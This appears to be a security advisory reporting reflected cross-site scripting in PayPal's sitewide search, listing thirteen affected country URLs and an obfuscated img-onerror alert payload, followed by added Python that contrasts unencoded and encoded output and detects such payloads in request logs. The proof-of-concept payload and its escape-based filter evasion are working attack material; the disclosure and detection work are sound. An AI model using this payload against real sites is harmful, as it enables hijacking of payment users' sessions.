+++++++++++++++++++++++
# Exploit Title : PAYPAL CROSS SITE SCRIPTING
# *Vendor*: https://www.paypal.com
# Author: Juan Carlos García (secnight)
# Blog: http://hackingmadrid.blogspot.com http://www.highsec.es http://blog.0verl0ad.com/
# http://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?sk=app_190322544333196
BRIEF DESCRIPTION
++++++++++++++++++++++++++
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders.
PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type.[4] In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.
++++++++++++++++++++++
Proof Of Concept
++++++++++++
https://www.paypal.com/ch/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/nl/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/be/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/jp/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/cn/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/fr/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ie/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ca/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/es/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/uk/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/pl/cgi-bin/webscr?cmd=_sitewide-search
XSS Payload: <img src="x:gif" onerror="window['al\u0065rt'](/XSS Juan Carlos Garcia/)"></img>
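The payload above only fires because the search term is written back into the page without HTML encoding. As an added example (not part of this advisory, and not PayPal code), the following Python puts the unencoded reflection pattern beside its encoded form and adds a log-side check that resolves JavaScript \uXXXX escapes before matching: to the browser `al\u0065rt` is the identifier `alert`, but a naive string match on request logs never sees it. The parameter name `q` and the two rendering functions are assumptions; the advisory names only the searchscr endpoint and cmd=_sitewide-search.

```python
import html
import re
from urllib.parse import parse_qs, urlencode

# The payload from the advisory, kept verbatim. Stored as a raw string so the
# JavaScript escape \u0065 reaches the code as the six literal characters an
# attacker would send, not as the letter 'e'.
PAYLOAD = r'''<img src="x:gif" onerror="window['al\u0065rt'](/XSS Juan Carlos Garcia/)"></img>'''

# Assumption: the search term travels in a parameter called "q". The advisory
# names only the endpoint and cmd=_sitewide-search, not the reflected parameter.
SAMPLE_QUERY_STRING = urlencode({"cmd": "_sitewide-search", "q": PAYLOAD})


def render_vulnerable(query: str) -> str:
    """Reflects the search term into HTML unencoded: the pattern behind reflected XSS."""
    return f"<p>Results for: {query}</p>"


def render_hardened(query: str) -> str:
    """Reflects the search term HTML-entity encoded, so the browser shows it as text."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


_EVENT_HANDLER_TAG = re.compile(r"<\w+[^>]*\son\w+\s*=", re.IGNORECASE)


def contains_event_handler(fragment: str) -> bool:
    """True if the HTML still contains a live element carrying an on* attribute."""
    return _EVENT_HANDLER_TAG.search(fragment) is not None


# --- log-side detection -----------------------------------------------------

_JS_UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")


def normalize_js_escapes(value: str) -> str:
    r"""Resolve JavaScript \uXXXX escapes so 'al\u0065rt' and 'alert' compare equal."""
    return _JS_UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)


def mentions_alert(value: str, normalize_first: bool = True) -> bool:
    """Whether the identifier 'alert' appears; without normalization the escape hides it."""
    text = normalize_js_escapes(value) if normalize_first else value
    return re.search(r"\balert\b", text) is not None


_XSS_INDICATORS = re.compile(
    r"<\s*\w+[^>]*\son\w+\s*="   # tag carrying an on* event handler
    r"|\balert\b"                # classic probe function
    r"|window\s*\[",             # bracket access used to assemble a property name
    re.IGNORECASE,
)


def flag_parameters(query_string: str) -> list:
    """Names of query parameters whose URL-decoded, escape-normalized value matches an indicator."""
    flagged = []
    for name, values in parse_qs(query_string, keep_blank_values=True).items():
        if any(_XSS_INDICATORS.search(normalize_js_escapes(v)) for v in values):
            flagged.append(name)
    return flagged


if __name__ == "__main__":
    print("vulnerable :", render_vulnerable(PAYLOAD))
    print("hardened   :", render_hardened(PAYLOAD))
    print("naive match:", mentions_alert(PAYLOAD, normalize_first=False))
    print("normalized :", mentions_alert(PAYLOAD))
    print("flagged    :", flag_parameters(SAMPLE_QUERY_STRING))
```

Context-aware output encoding is the fix; the detection part is only a triage aid for request logs, and the escape normalization is what keeps a filter-evasion spelling of a probe from slipping past it.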